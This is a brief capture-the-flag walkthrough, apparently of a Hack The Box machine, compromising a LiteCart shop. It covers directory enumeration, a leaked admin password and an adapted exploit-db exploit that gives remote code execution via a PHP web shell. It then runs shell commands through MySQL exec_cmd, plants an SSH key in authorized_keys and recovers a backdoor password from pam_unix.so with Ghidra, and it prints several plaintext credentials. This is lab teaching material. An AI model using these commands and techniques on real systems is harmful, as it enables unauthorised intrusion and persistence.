From the quick nmap scan I saw that two ports were open
SSH and http
By browsing into the port 80, I get to know that litecart is during
by running gobuster I found /backup directory
From there I got a tar file. I downloaded it my local machine
From the file at shop/admin/login.php from the tar file I got a new location to browse for
on browsing i got admin password
username : admin
password: theNextGenSt0r3!~
By logging in with the above credential at /shop/admin I was able to confirm the version of litecart
https://www.exploit-db.com/exploits/45267
This exploit will not work directly. I did some edits to the file
and along with php bypass file I was able to get RCE
I got the byepass code from below exploit
https://www.exploit-db.com/exploits/47462
python LiteCart.py -p 'theNextGenSt0r3!~' -u admin -t http://10.10.10.207/shop/admin/
I got RCE on browser
I found that mysql is there as user
on running
http://10.10.10.207/shop/vqmod/xml/mybypass.php?c=mysql -u root -pchangethis -e "select exec_cmd('whoami')"
I generated a key pair on my local machine
http://10.10.10.207/shop/vqmod/xml/mybypass.php?c=mysql -u root -pchangethis -e "select exec_cmd(echo *publick key*
> /var/lib/mysql/.ssh/authorized_keys')"
I have changed the key of mysql user with key I have generated
Now I should be able to SSH into the system as mysql user
After loggin in and a enumerating the files I got a intresting output
Password = 3*NLJE32I$Fe
I tried to ssh as sysadmin using the password
With the clue I got I searched for file which was recently modified i found /lib/x86_64-linux-gnu/security/.pam_unix.so
I downloaded the file
scp [email protected]:/lib/x86_64-linux-gnu/security/pam_unix.so ./pam.soI opened it using gihdra
I started a new project
After that I just dragged the .so file onto the application
from opening the authenticate file
This is equivalent to zlke~U3Env82m2-
